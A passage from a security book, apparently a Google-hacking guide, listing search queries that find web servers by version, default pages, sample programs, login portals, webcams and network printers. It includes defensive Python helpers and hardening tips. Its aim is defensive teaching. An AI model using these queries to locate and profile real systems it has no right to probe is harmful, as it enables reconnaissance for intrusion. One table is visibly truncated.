To use this table, simply supply the text in the Error Page Title column as an intitle search and a portion of the text column as an additional phrase in the search query. Since some of the text is lengthy, you might need to select a unique portion of the text or replace common words with the asterisk, which helps keep your search query within the 10-word limit imposed on Google queries. For example, a good query for the first line of the table might be "response from * upstream server" intitle:"Bad Gateway!". Alternately, you could also rely on the "think this is a server error" phrase combined with a title search, such as "think this is a server error" intitle:"Bad Gateway!". Different versions of Apache will display slightly different error messages, but the process of locating and creating solid base searches from software source code is something you should get comfortable with to stay ahead of the ever-changing software market.

This technique can be expanded to find Apache servers in other languages by reviewing the rest of the contact.html.var file. The important strings from that file are listed in Table 8.3.
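The advice on using Table 8.2 (title as an intitle search, common words swapped for asterisks) can be sketched as follows. Several things here are assumptions made for illustration: the `COMMON_WORDS` list is arbitrary, the function names are hypothetical, and the counting rule (wildcards and operator names such as intitle: do not count toward the limit) is one reading of the 10-word limit rather than a documented rule.

```python
import re

# Hypothetical list of "common" words to replace with wildcards; tune as needed.
COMMON_WORDS = {"a", "an", "the", "of", "or", "and", "to"}


def wildcard(phrase):
    """Replace common words in a phrase with the * wildcard."""
    return " ".join("*" if w.lower() in COMMON_WORDS else w for w in phrase.split())


def counted_words(query):
    """Count query words, ignoring wildcards and operator names (assumed rule)."""
    without_operators = re.sub(r"\b\w+:", " ", query)
    return len(re.findall(r"[\w']+", without_operators))


def build_query(title, phrase):
    """Build a phrase-plus-title query in the style used with Table 8.2."""
    return '"%s" intitle:"%s"' % (wildcard(phrase), title)


if __name__ == "__main__":
    query = build_query("Bad Gateway!", "response from an upstream server")
    print(query, "->", counted_words(query), "counted words")
```

Swapping in wildcards is not always enough on its own: the full "Request time-out!" text still has more than ten counted words after substitution, so a shorter, distinctive portion of the sentence has to be chosen by hand.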
Because the sentences and phrases in Table 8.3 are included in every Apache 2.0 error message, they should appear in the text of every error page that the Apache server produces, making them ideal for base searches. It is possible (and fairly easy) to modify these error pages to provide a more polished appearance when a user encounters an error, but remember: Hackers have different motivations. Some are simply interested in locating particular versions of a server, perhaps to exploit. By that criterion, there is no shortage of servers on the Internet that are using these default error phrases.

Table 8.3 Phrases Located on All Default Apache (2.0.28-2.0.52) Error Pages

Language   Phrase
German     Sofern Sie dies für eine Fehlfunktion des Servers halten, informieren Sie bitte den hierüber.
English    If you think this is a server error, please contact.
Spanish    En caso de que usted crea que existe un error en el servidor.
French     Si vous pensez qu'il s'agit d'une erreur du serveur, veuillez contacter.
Swedish    Om du tror att detta beror på ett serverfel, vänligen kontakta.

Besides Apache and IIS, other servers can be located by searching for server-produced error messages, but we're trying to keep this book just a bit thinner than your local yellow pages, so we'll draw the line at just these two servers.

Application Software Error Messages

The error messages we've looked at so far have all been generated by the Web server itself. In many cases, applications running on the Web server can generate errors that reveal information about the server as well. There are untold thousands of Web applications on the Internet, each of which can generate any number of error messages.
Dedicated Web assessment tools such as SPI Dynamics' WebInspect excel at performing detailed Web application assessments, making it seem a bit pointless to troll Google for application error messages. However, we search for error message output throughout this book simply because the data contained in error messages should not be overlooked. We've looked at various error messages in previous chapters, and we'll see more error messages in later chapters, but let's take a quick look at how error messages can help profile a Web server and its applications. Admittedly, we will hardly scratch the surface of this topic, but we'll make an effort to stimulate your thinking about Google's ability to locate these sometimes very telling error messages.

One query, "Fatal error: Call to undefined function" -reply -the -next, will locate Active Server Page (ASP) error messages. These messages often reveal information about the database software in use on the server as well as information about the application that caused the error (see Figure 8.9).

Figure 8.9 ASP Custom Error Messages

Although this ASP message is fairly benign, some ASP error messages are much more revealing.
Consider the query "ASP.NET_SessionId" "data source=", which locates unique strings found in ASP.NET application state dumps, as shown in Figure 8.10. These dumps reveal all sorts of information about the running application and the Web server that hosts that application. An advanced attacker could use encrypted password data and variable information in these stack traces to subvert the security of the application and perhaps the Web server itself.

Figure 8.10 ASP Dumps Provide Dangerous Details

PHP application errors are fairly commonplace. They can reveal all sorts of information that an attacker can use to profile a server. One very common error can be found with a query such as intext:"Warning: Failed opening" include_path, as shown in Figure 8.11.

Figure 8.11 Many Errors Reveal Pathnames and Filenames
CGI programs often reveal information about the Web server and its applications in the form of environment variable dumps. A typical environmental variable output page is shown in Figure 8.12.

Figure 8.12 CGI Environment Listings Reveal Lots of Information

This screen shows information about the Web server and the client that connected to the page when the data was produced. Since Google's bot crawls pages for us, one way to find these CGI environment pages is to focus on the trail left by the bot, reflected in these pages as the "HTTP_FROM=googlebot" line. We can search for pages like this with a query such as "HTTP_FROM=googlebot" googlebot.com "Server_Software".
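To show what an assessor might pull out of such a dump once it has been found, here is a small Python sketch. The `SAMPLE_DUMP` lines are illustrative values modeled on the kind of output in Figure 8.12, not a transcript of it, and the `INTERESTING` list and function names are hypothetical choices.

```python
import re

# Illustrative dump lines; values are examples, not copied from a real page.
SAMPLE_DUMP = """\
HTTP_USER_AGENT : Googlebot/2.1 (+http://www.google.com/bot.html)
GATEWAY_INTERFACE : CGI/1.1
SERVER_SOFTWARE : Apache/1.3.26 (Unix)
SCRIPT_FILENAME : /local/apache/cgi-bin/env
HTTP_FROM : googlebot(at)googlebot.com
"""

# Accept either "NAME : value" or "NAME=value", since dump formats vary.
ENV_LINE = re.compile(r"^\s*([A-Z][A-Z0-9_]*)\s*[:=]\s*(.*)$")

# Hypothetical short list of variables that help profile a server.
INTERESTING = ("SERVER_SOFTWARE", "SCRIPT_FILENAME", "DOCUMENT_ROOT", "SERVER_ADMIN")


def parse_env_dump(text):
    """Turn a CGI environment dump into a dictionary of name -> value."""
    env = {}
    for line in text.splitlines():
        match = ENV_LINE.match(line)
        if match:
            env[match.group(1)] = match.group(2).strip()
    return env


def profile(env):
    """Keep only the variables useful for server profiling."""
    return {name: env[name] for name in INTERESTING if name in env}


if __name__ == "__main__":
    for name, value in profile(parse_env_dump(SAMPLE_DUMP)).items():
        print("%s: %s" % (name, value))
```

Even this small subset exposes the server version and a file system path, which is the kind of detail the surrounding text warns about.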
These pages are dynamically generated, which means that you must look at Google's cache to see the document as it was crawled. To locate good base searches for a particular application, it's best to look at the source code of that application. Using the techniques we've explored so far, it's simple to create these searches.

Default Pages

Another way to locate specific types of servers or Web software is to search for default Web pages. Most Web software, including the Web server software itself, ships with one or more default or test pages. These pages can make it easy for a site administrator to test the installation of a Web server or application. By providing a simple page to test, the administrator can simply connect to his own Web server with a browser to validate that the Web software was installed correctly. Some operating systems even come with Web server software already installed. In this case, the owner of the machine might not even realize that a Web server is running on his machine. This type of casual behavior on the part of the owner will lead an attacker to rightly assume that the Web software is not well maintained and is, by extension, insecure. By further extension, the attacker can also assume that the entire operating system of the server might be vulnerable by virtue of poor maintenance.

In some cases, Google crawls a Web server while it is in its earliest stages of installation, still displaying a set of default pages. In these cases there's generally a short window of time between the moment when Google crawls the site and when the intended content is actually placed on the server. This means that there could be a disparity between what the live page is displaying and what Google's cache displays. This makes little difference from a Google hacker's perspective, since even the past existence of a default page is enough for profiling purposes. Remember, we're essentially searching Google's cached version of a page when we submit a query.
Regardless of the reason a server has default pages installed, there's an attacker somewhere who will eventually show interest in a machine displaying default pages found with a Google search.

A classic example of a default page is the Apache Web server default page, shown in Figure 8.13.

Figure 8.13 A Typical Apache Default Web Page

Notice that the administrator's e-mail is generic as well, indicating that not a lot of attention was paid to detail during the installation of this server. These default pages do not list the version number of the server, which is a required piece of information for a successful attack. It is possible, however, that an attacker could search for specific variations in these default pages to find specific ranges of server versions. As shown in Figure 8.14, an Apache server running versions 1.3.11 through 1.3.26 shows a slightly different page than the Apache server versions 1.3.0 through 1.3.9, shown in Figure 8.13.
Figure 8.14 Subtle Differences in Apache Default Pages
[Figure: cached page titled "Test Page for Apache Installation" that confirms the Apache installation was successful and continues under the heading "Seeing this instead of the website you expected?"]

Using these subtle differences to our advantage, we can use specific Google queries to locate servers with these default pages, indicating that they are most likely running a specific version of Apache. Table 8.4 shows queries that can be used to locate specific families of Apache running default pages.

Table 8.4 Queries That Locate Default Apache Installations

Apache Server Version     Query
Apache 1.2.6              intitle:"Test Page for Apache Installation" "You are free"
Apache 1.3.0-1.3.9        intitle:"Test Page for Apache" "It worked!" "this Web site!"
Apache 1.3.11-1.3.31      intitle:Test.Page.for.Apache seeing.this.instead
Apache 2.0                intitle:Simple.page.for.Apache Apache.Hook.Functions
Apache SSL/TLS            intitle:test.page "Hey, it worked !" "SSL/TLS-aware"
Apache on Red Hat         "Test Page for the Apache Web Server on Red Hat Linux"
Apache on Fedora          intitle:"test page for the apache http server on fedora core"
Apache on Debian          intitle:"Welcome to Your New Home Page!" debian
Apache on other Linux     intitle:"Test Page Apache Web Server on" -red.hat -fedora

IIS also displays a default Web page when first installed. A query such as intitle:"Welcome to IIS 4.0" can locate very specific versions of IIS, as shown in Figure 8.15.

Figure 8.15 Locating Default Installations of IIS 4.0 on Windows NT 4.0/OP
[Figure: cached page titled "Welcome To IIS 4.0!" showing the Microsoft Windows NT 4.0 Option Pack welcome text.]
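For defenders, queries like these are most useful when restricted to a domain they own. The following Python sketch shows one way that could be done, assuming the site: operator is used to scope the query; the dictionary holds a few queries copied from this section, while the helper names scoped_query and search_url and the domain example.com are hypothetical.

```python
from urllib.parse import urlencode

# A few default-page queries copied from this section, keyed by the server
# family they are meant to locate.
DEFAULT_PAGE_QUERIES = {
    "Apache 1.3.0-1.3.9": 'intitle:"Test Page for Apache" "It worked!" "this Web site!"',
    "Apache 1.3.11-1.3.31": "intitle:Test.Page.for.Apache seeing.this.instead",
    "IIS 4.0": 'intitle:"Welcome to IIS 4.0"',
}


def scoped_query(query: str, domain: str) -> str:
    """Restrict a query to one domain by prefixing the site: operator."""
    return f"site:{domain} {query}"


def search_url(query: str) -> str:
    """Build a Google search URL with the query safely percent-encoded."""
    return "https://www.google.com/search?" + urlencode({"q": query})


if __name__ == "__main__":
    # example.com is a placeholder; substitute a domain you administer.
    for family, query in DEFAULT_PAGE_QUERIES.items():
        print(family, search_url(scoped_query(query, "example.com")))
```

Keeping the queries in a table-like structure mirrors the layout of Table 8.4 and makes it easy to add or retire entries as default pages change.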
Table 8.5 Queries That Locate Specific IIS Server Versions

IIS Server Version     Query
Many                   intitle:"welcome to" intitle:internet IIS
Unknown                intitle:"Under construction" "does not currently have"
IIS 4.0                intitle:"welcome to IIS 4.0"
IIS 4.0                allintitle:Welcome to Windows NT 4.0 Option Pack
IIS 4.0                allintitle:Welcome to Internet Information Server
IIS 5.0                allintitle:Welcome to Windows 2000 Internet Services
IIS 6.0                allintitle:Welcome to Windows XP Server Internet Services

Although each version of IIS displays distinct default Web pages, in some cases service packs or hotfixes could alter the content of a default page. In these cases, the subtle page changes can be incorporated into the search to find not only the operating system version and Web server version but also the service pack level and security patch level. This information is invaluable to an attacker bent on hacking not only the Web server, but hacking beyond the Web server and into the operating system itself. In most cases, an attacker with control of the operating system can wreak more havoc on a machine than a hacker who controls only the Web server.

Netscape servers can also be located with simple queries such as allintitle:Netscape Enterprise Server Home Page, as shown in Figure 8.16.

Figure 8.16 Locating Netscape Web Servers
[Figure: cached page titled "Netscape Enterprise Server Home Page" describing Netscape Enterprise Server 3.0 and its search, Web Publisher, access control, and agent features.]
Other Netscape servers can be found with simple allintitle searches, as shown in Table 8.6.

Table 8.6 Queries That Locate Netscape Servers

Netscape Server Type     Query
Enterprise Server        allintitle:Netscape Enterprise Server Home Page
FastTrack Server         allintitle:Netscape FastTrack Server Home Page

Many different types of Web server can be located by querying for default pages as well. Table 8.7 lists a sample of more esoteric Web servers that can be profiled with this technique.
Table 8.7 Queries That Locate More Esoteric Servers

Server/Version               Query
Cisco Micro Webserver 200    "micro webserver home page"
Generic Appliance            "default web page" congratulations "hosting appliance"
HP appliance sa1             intitle:"default domain page" "congratulations" "hp web"
iPlanet/Many                 intitle:"web server, enterprise edition"
Intel Netstructure           "congratulations on choosing" Intel netstructure
JWS/1.0.3-2.0                allintitle:default home page Java web server
J2EE/Many                    intitle:"default j2ee home page"
Jigsaw/2.2.3                 intitle:"jigsaw overview" "this is your"
Jigsaw/Many                  intitle:"jigsaw overview"
KFSensor honeypot            "KF Web Server Home Page"
Kwiki                        "Congratulations! You've created a new Kwiki website."
Matrix Appliance             "Welcome to your domain web page" matrix
NetWare 6                    intitle:"welcome to netware 6"
Resin/Many                   allintitle:Resin Default Home Page
Resin/Enterprise             allintitle:Resin-Enterprise Default Home Page
Sambar Server                intitle:"sambar server" "1997..2004 Sambar"
Sun AnswerBook Server        inurl:"Answerbook2options"
TivoConnect Server           inurl:/TiVoConnect

Default Documentation

Web server software often ships with manuals and documentation that end up in the Web directories. An attacker could use this documentation to either profile or locate Web software. For example, Apache Web servers ship with documentation in HTML format, as shown in Figure 8.17.
Figure 8.17 Apache Documentation Used for Profiling
[Figure: index page of the Apache HTTP Server Version 2.0 documentation, listing the reference manual, how-to and tutorial sections, and platform-specific notes.]

In most cases, default documentation does not portray the server version as accurately as error messages or default pages do, but this information can certainly be used to locate targets and to gain an understanding of the potential security posture of the server. If the server administrator has forgotten to delete the default documentation, an attacker has every reason to believe that other details such as security have been overlooked as well. Other Web servers, such as IIS, ship with default documentation as well, as shown in Figure 8.18.
Figure 8.18 IIS Server Profiled Via Default Manuals
[Figure: page titled "Microsoft Internet Information Services 5.0 Documentation", located with inurl:iishelp core, showing the Getting Started section with release notes, documentation tips, and a glossary.]

In most cases, specialized programs such as CGI scanners or Web application assessment tools are better suited for finding these default pages and programs, but if Google has crawled the pages (from a link on a default main page, for example), you'll be able to locate these pages with Google queries. Some queries that can be used to locate default documentation are listed in Table 8.8.

Table 8.8 Queries That Locate Default Documentation

Search Subject                               Query
Apache 1.3                                   intitle:"Apache 1.3 documentation"
Apache 2.0                                   intitle:"Apache 2.0 documentation"
Apache Various                               intitle:"Apache HTTP Server" intitle:"documentation"
ColdFusion                                   inurl:cfdocs
EAServer                                     intitle:"Easerver" "Easerver Version Documents"
iPlanet Server 4.1/Enterprise Server 4.0     inurl:"/manual/servlets/" intitle:"programmer"
IIS/Various                                  inurl:iishelp core
Lotus Domino 6                               intext:/help/help6_client.nsf
Novell Groupwise 6                           inurl:/com/novell/gwmonitor
Novell Groupwise WebAccess                   inurl:"/com/novell/webaccess"
Novell Groupwise WebPublisher                inurl:"/com/novell/webpublisher"

Sample Programs

In addition to documentation and manuals that ship with Web software, it is fairly common for default applications to be included with a software package.
These default applications, like default Web pages, help demonstrate the functionality of the software and serve as a starting point for developers, providing sample routines and code that could be used as learning tools. Unfortunately, these sample programs can be used not only to profile a Web server; they often contain flaws or functionality an attacker could use to compromise the server. The Microsoft Index Server simple content query page, shown in Figure 8.19, allows Web visitors to search through the content of a Web site. In some cases, this query page could locate pages that are not linked from any other page or that contain sensitive information.

Figure 8.19 Microsoft Index Server Simple Content Query Page
[Figure: cached page titled "Index Server Search Form", located with inurl:samples/Search/queryhit, showing the simple content query box and links to the file size, file modification time, and file author property query pages.]

As with default pages, specialized programs designed to crawl a Web site in search of these default programs are much better suited for finding these pages. However, if a default page provided with a Web server contains links to demonstration pages and programs, Google will find them. In some cases, the cache of these pages will remain even after the main page has been updated and the links removed. Table 8.9 shows some queries that can be used to locate default-installed programs.
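An administrator can apply the same reasoning to a list of URLs from his or her own site (from a crawl or a server log, for example) before Google does. The Python sketch below is a minimal illustration under stated assumptions: the path fragments are taken from inurl: queries that appear in this section, the labels and the function name find_default_content are hypothetical, and the sample URLs are invented.

```python
from typing import Iterable, List, Tuple
from urllib.parse import urlsplit

# Path fragments borrowed from inurl: queries in this section. The labels are
# illustrative; extend the mapping to suit the software you actually run.
DEFAULT_CONTENT_FRAGMENTS = {
    "cfdocs": "ColdFusion documentation",
    "iishelp": "IIS documentation",
    "/com/novell/gwmonitor": "Novell GroupWise 6 documentation",
    "samples/search/queryhit": "Microsoft Index Server sample",
}


def find_default_content(urls: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (url, label) pairs for URLs whose path looks like default content."""
    findings = []
    for url in urls:
        # Compare case-insensitively against the path only, not the host name.
        path = urlsplit(url).path.lower()
        for fragment, label in DEFAULT_CONTENT_FRAGMENTS.items():
            if fragment in path:
                findings.append((url, label))
    return findings
```

A substring match is deliberately crude; it errs on the side of flagging too much, which is usually acceptable for a cleanup checklist.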
Table 8.9 Queries That Locate Default Programs

Software                          Query
Apache Cocoon                     inurl:cocoon/samples/welcome
Generic                           inurl:demo | inurl:demos
Generic                           inurl:sample | inurl:samples
IBM Websphere                     inurl:WebSphereSamples
Lotus Domino 4.6                  inurl:/sample/framew46
Lotus Domino 4.6                  inurl:/sample/faqw46
Lotus Domino 4.6                  inurl:/sample/pagesw46
Lotus Domino 4.6                  inurl:/sample/siregw46
Lotus Domino 4.6                  inurl:/sample/faqw46
Microsoft Index Server            inurl:samples/Search/queryhit
Microsoft Site Server             inurl:siteserver/docs
Novell NetWare 5                  inurl:/lcgi/sewse.nlm
Novell GroupWise WebPublisher     inurl:/servlet/webpub groupwise
Netware WebSphere                 inurl:/servlet/SessionServlet
OpenVMS                           inurl:sys$common
Oracle Demos                      inurl:/demo/sql/index.jsp
Oracle JSP Demos                  inurl:demo/basic/info
Oracle JSP Scripts                inurl:ojspdemos
Oracle 9i                         inurl:/pls/simpledad/admin_
IIS/Various                       inurl:iissamples
IIS/Various                       inurl:/scripts/samples/search
Sambar Server                     intitle:"Sambar Server Samples"

Locating Login Portals

The term login portal describes a Web page that serves as a "front door" to a Web site. Login portals are designed to allow access to specific features or functions after a user logs in. Google hackers search for login portals as a way to profile the software that's in use on a target and to locate links and documentation that might provide useful information for an attack. In addition, if an attacker has an exploit for a particular piece of software, and that software provides a login portal, the attacker can use Google queries to locate potential targets.

Some login portals, like the one shown in Figure 8.20, captured with allinurl:"exchange/logon.asp", are obviously default pages provided by the software manufacturer (in this case, Microsoft).
Just as an attacker can get an idea of the potential security of a target by simply looking for default pages, a default login portal can indicate that the technical skill of the server's administrators is generally low, revealing that the security of the site will most likely be poor as well. To make matters worse, default login portals like the one shown in Figure 8.20 indicate the software revision of the program (in this case, version 5.5 SP4). An attacker can use this information to search for known vulnerabilities in that software version.

Figure 8.20 Outlook Web Access Default Portal
[Figure: cached Outlook Web Access logon page reading "Web Access for Microsoft (R) Exchange Server Version 5.5 SP4", with a Log On box for Exchange users and a Public Access link for browsing public folders, finding names in the Address Book, and posting messages anonymously.]

By following links from the login portal, an attacker can often gain access to other information about the target. The Outlook Web Access portal is particularly renowned for this type of information leak because it provides an anonymous public access area that can be viewed without logging in to the mail system. This public access area sometimes provides access to a public directory or to broadcast e-mails that can be used to gather usernames or information, as shown in Figure 8.21.
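To see how little effort it takes to lift a revision out of a portal banner, consider the following Python sketch. It is an illustration only: the regular expression assumes a banner of the form "Version 5.5 SP4", as on the portal in Figure 8.20, and the name extract_version is hypothetical. Running it against your own portal pages shows what a casual visitor, or a search engine cache, can learn.

```python
import re
from typing import Optional, Tuple

# Matches "Version <dotted number>" optionally followed by a service pack tag
# such as "SP4". The banner layout is an assumption based on Figure 8.20.
VERSION_PATTERN = re.compile(
    r"Version\s+(?P<version>\d+(?:\.\d+)*)(?:\s+(?P<service_pack>SP\d+))?",
    re.IGNORECASE,
)


def extract_version(banner: str) -> Optional[Tuple[str, Optional[str]]]:
    """Return (version, service_pack) found in a banner, or None if absent."""
    match = VERSION_PATTERN.search(banner)
    if match is None:
        return None
    return match.group("version"), match.group("service_pack")
```

If this returns anything other than None for a page that is reachable without logging in, the banner is a candidate for removal or customization.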
Figure 8.21 Public Access Areas Can Be Found from Login Portals
[Figure: a message posted to an "HQ Emergency Announcement" public folder, dated 12/5/02, announcing an early dismissal for all Headquarters personnel due to extreme weather conditions and signed with the sender's name.]

Some login portals provide more details than others. As shown in Figure 8.22, the Novell Management Portal provides a great deal of information about the server, including server software version and revision, application software version and revision, software upgrade date, and server uptime. This type of information is very handy for an attacker staging an attack against the server.

Figure 8.22 Novell Management Portal Reveals a Great Deal of Information
[Figure: cached NetWare Management Portal page, located with an intext:"netware management portal version" query, listing the NetWare server version and revision, the portal version (1.10) and revision, and the server up time (28:05:42:09).]

Table 8.9 shows some queries that can be used to locate various login portals. Refer to Chapter 4 for more information about login portals and the information they reveal.
Table 8.9 Queries That Locate Login Portals

Login Portal                     Query
4Images GMS                      "4images Administration Control Panel"
Apache Tomcat Admin              intitle:"Tomcat Server Administration"
ASP.NET                          inurl:ASP.login_aspx
Citrix Metaframe                 inurl:/Citrix/Nfuse17/
Citrix Metaframe                 inurl:citrix/metaframexp/default/login.asp
ColdFusion Admin                 intitle:"ColdFusion Administrator Login"
ColdFusion Generic               inurl:login.cfm
Compaq Insight Manager           inurl:cpqlogin.htm
CuteNews                         "powered by CuteNews" "© CutePHP
Easy File Sharing                intitle:"Login - powered by Easy File Sharing Web
Emule                            "Web Control Panel" "Enter your password here"
Ensim Enterprise                 intitle:"Welcome Site/User Administrator" "Please
Generic Admin                    inurl:/admin/login.asp
Generic User                     inurl:login.asp
Generic                          "please log in"
GradeSpeed                       inurl:"gs/adminlogin.aspx"
Infopop UBB                      inurl:cgi-bin/ultimatebb.cgi?ubb=login
Jetbox CMS                       Login ("Powered by Jetbox One CMS ™" | "Powered by Jetstream ©")
Lotus Domino Admin               inurl:"webadmin" filetype:nsf
Lotus Domino                     inurl:names.nsf?opendatabase
Mambo CMS Admin                  inurl:administrator "welcome to mambo"
Microsoft Certificate Server     intitle:"microsoft certificate services" inurl:certsrv
Microsoft Outlook Web Access     allinurl:"exchange/logon.asp"

Table 8.9 Queries That Locate Login Portals (continued)

Login Portal                     Query
Microsoft Outlook Web Access
Microsoft Remote Desktop

[Figure: device home page headed "Select from the menu above to modify server configuration", listing the server name, boot code version, firmware version, uptime, hardware address, IP address, subnet mask, port status, and enabled protocols (TCP/IP, IPX, LAT).]

All types of devices can be connected to a network.
In Chapter 5, we discussed network devices that reveal a great deal of information about the network they are attached to. These devices, ranging from switches and routers to printers and even firewalls, are considered great finds for any attacker interested in network reconnaissance, but some devices such as Webcams are interesting finds for an attacker as well.

In most cases, a network-connected Webcam is not considered a security threat but more a source of entertainment for any Web surfer. Keep a few things in mind, however. First, some companies consider it trendy and cool to provide customers a look around their workplace. Netscape was known for this back in its heyday. The Webcams located on these companies' premises were obviously authorized by upper management. A look inside a facility can be a huge benefit if your job boils down to a physical assessment. Second, it's not all that uncommon for a Webcam to be placed outside a facility, as shown in Figure 8.24. This type of cam is a boon for a physical assessment. Also, don't forget that what an employee does at work doesn't necessarily reflect what he does on his own time. If you locate an employee's personal Web space, there's a fair chance that these types of devices will exist.

Figure 8.24 Webcams Placed Outside a Facility
[Figure: outdoor Webcam image served by a page marked "powered by webcamXP PRO".]

Most network printers manufactured these days have some sort of Web-based interface installed. If these devices (or even the documentation or drivers supplied with these devices) are linked from a Web page, various Google queries can be used to locate them. Once located, network printers can provide an attacker with a wealth of information. As shown in Figure 8.25, it is very common for a network printer to list details about the surrounding network, naming conventions, and more.
Many devices located through a Google search are still running a default, insecure configuration with no username or password needed to control the device. In a worst-case scenario, attackers can view print jobs and even coerce these printers to store files or even send network commands.

Figure 8.25 Networked Printers Provide Lots of Details
[Figure: CentreWare Internet Services "About Printer" page for a Xerox Phaser 4500, listing the printer model, serial number, machine address, operating system and networking versions, installed memory, page description languages, and installed options.]

Table 8.10 shows queries that can be used to locate various network devices. Refer back to Chapter 5 for more conventional network devices such as routers, switches, proxy servers, and firewalls.
Table 8.10 Queries That Locate Various Network Devices

Device                         Query
Axis Video Server (CAM)        inurl:indexFrame.shtml Axis
AXIS Video Live Camera         intitle:"Live View / - AXIS"
AXIS Video Live View           intitle:"Live View / - AXIS" | inurl:view/view.sht
AXIS 200 Network Camera        intitle:"The AXIS 200 Home Page"
Canon Network Camera           intitle:liveapplet inurl:LvAppl
Mobotix Network Camera         intext:"MOBOTIX M1" intext:"Open Menu"
Panasonic Network Camera       intitle:"WJ-NT104 Main Page"
Panasonic Network Camera       inurl:"ViewerFrame?Mode="
Sony Network Camera            SNC-RZ30 HOME
Seyeon FlexWATCH Camera        intitle:flexwatch intext:"Home page ver"
Sony Network Camera            intitle:snc-z20 inurl:home/
webcamXP                       "powered by webcamXP" "Pro | Broadcast"
Canon ImageReady               intitle:"remote ui:top page"
Fiery Printer Interface        ("Fiery WebTools" inurl:index2.html) | "WebTools enable observe, , flow print jobs"
Konica Printers                intitle:"network administration" inurl:"nic"
RICOH Copier                   inurl:sts_index.cgi
RICOH Printers                 intitle:RICOH intitle:"Network Administration"
Tektronix Phaser Printer       intitle:"View and Configure PhaserLink"
[illegible]                    inurl:live_status.html
Xerox Phaser 6250 Printer      Phaser 6250 Printer Neighborhood "XEROX CORPORATION"
Xerox Phaser 740 Printer       "Phaser® 740 Color Printer" "printer named: " phaserlink
Xerox Phaser 8200 Printer      "Phaser 8200" "© Xerox" "refresh" " Email Alerts"
Xerox Phaser 840 Printer       Phaser® 840 Color Printer
Xerox Centreware Printers      intext:centreware inurl:status
XEROX WorkCentre               intitle:"XEROX WorkCentre PRO - Index"

Summary

Attackers use Google for a variety of reasons. An attacker might have access to an exploit for a particular version of Web software and may be on the prowl for vulnerable targets.
Other times the attacker might have decided on a target and is using Google to locate information about other devices on the network. In some cases, an attacker could simply be looking for Web devices that are poorly configured with default pages and programs, indicating that the security around the device is soft.

Directory listings provide information about the software versions in use on a device. Server and application error messages can provide a wealth of information to an attacker and are perhaps the most underestimated of all information-gathering techniques. Default pages, programs, and documentation not only can be used to profile a target, but they serve as an indicator that the server is somewhat neglected and perhaps vulnerable to exploitation. Login portals, while serving as the "front door" of a Web server for regular users, can be used to profile a target and to locate more information about services and procedures in use, and they act as a virtual magnet for attackers armed with matching exploits. In some cases, login portals are set up by administrators to allow remote access to a server or network. This type of login portal, if compromised, can provide an entry point for an intruder as well. Whatever motivates an attacker, it's best to understand the techniques he or she could employ so that you can protect yourself and your customers from this type of threat.

Solutions Fast Track

Locating and Profiling Web Servers

☑ Directory listings and default server-generated error messages can provide details about the server. Even though this information could be obtained by connecting directly to the server, an attacker armed with an exploit for a particular version of software could find a target using a Google query designed to locate this information.
☑ Server and application error messages provide a great deal of information, ranging from software versions and patch level to snippets of source code and information about system processes and programs. Error messages are one of the most underestimated forms of information leakage.
☑ Default pages, documentation, and programs speak volumes about the server that hosts them. They suggest that a server is not well maintained and is by extension vulnerable due to poor maintenance.

Locating Login Portals

☑ Login portals can draw attackers who are searching for specific types of software. In addition, they can serve as a starting point for information-gathering attacks, since most login portals are designed to be user friendly, providing links to help documents and procedures to aid new users. Administrative login portals and remote administration tools are sometimes even more dangerous, especially if they are poorly configured.

Locating Network Hardware

☑ All sorts of network devices can be located with Google queries. These devices are more than a passing technological curiosity for some attackers, since many devices linked from the Web are poorly configured, trusted devices often overlooked by typical security auditors. Web cameras are often overlooked devices that can provide insight for an attacker, even though an extremely small percentage of targets have Web cameras installed. Network printers, when compromised, can reveal a great deal of sensitive information, especially for an attacker capable of viewing print jobs and network information.

Frequently Asked Questions

The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com.
Q: I run an IIS 6.0 server, and I don't like the idea of those static HTTP 1.1 error pages hanging around my site, luring potential malicious interest in my server. How can I enable the customized error messages?

A: If you aren't in the habit of just asking Google by now, you should be! Seriously, try a Google search for site:microsoft.com "Configuring Custom Error Messages" IIS 6.0. At the time of this writing, the article describing this procedure is the first hit. The procedure involves firing up the IIS Manager, double-clicking My Computer, right-clicking the Web Sites folder, and selecting Properties. See the Custom Errors tab.

Q: I run an Apache server, and I don't like the idea of those server tags on error messages and directory listings. How can I turn these off?

A: To remove the tags, locate the section in your httpd.conf file (usually in /etc/httpd/conf/httpd.conf) that contains the following:

    #
    # Optionally add a line containing the server version and virtual host
    # name to server-generated pages (error documents, FTP directory listings,
    # mod_status and mod_info output etc., but not CGI generated documents).
    # Set to "EMail" to also include a mailto: link to the ServerAdmin.
    # Set to one of:  On | Off | EMail
    #
    ServerSignature On

The ServerSignature setting can be changed to Off to remove the tag altogether or to EMail, which presents an e-mail link with the ServerAdmin e-mail address as it appears in the httpd.conf file.

Q: I've got an idea for a search that's not listed here. If you're so smart about Google, why isn't my search listed in this book?

A: This book serves as more of a primer than a reference book. There are so many possible Google searches out there that it's impossible to include them all in one book. Most searches listed in this book are the result of a community of people working together to come up with as many effective searches as possible.
Fortunately, this community of individuals has created a unique and extensive database that is open to the public for the purposes of adequately defending against this unique threat. The Search Engine Hacking forum and the Google Hacking Database (GHDB) are both available at http://johnny.ihackstuff.com. If you've got a new search, first search the database to make sure it's unique. If you think it is, submit it to the forums, and your search could be the newest addition to the database. But beware, Google searcher. Google hacking is fun and addictive. If you submit one search, I think you'll find it's hard to stop. Just ask any of the individuals on the Google Master's list. Some of them found it hard to stop at 10 or 20 unique submitted searches! Check out the Acknowledgments page for a list of users who have made a significant contribution to the Google hacking community.

Chapter 9

Usernames, Passwords, and Secret Stuff, Oh My!

Solutions in this Chapter:

■ Searching for Usernames
■ Searching for Passwords
■ Searching for Cri...
■ Searching for Other Juicy Info

☑ Summary
☑ Solutions Fast Track
☑ Frequently Asked Questions

Introduction

This chapter is not about finding sensitive data during an assessment as much as it is about what the "bad guys" might do to troll for the data. The examples presented in this chapter generally represent the lowest-hanging fruit on the security tree. Hackers target this information on a daily basis. To protect against this type of attacker, we need to be fairly candid about the worst-case possibilities. We won't be overly candid, however.

We start by looking at some queries that can be used to uncover usernames, the less important half of most authentication systems.
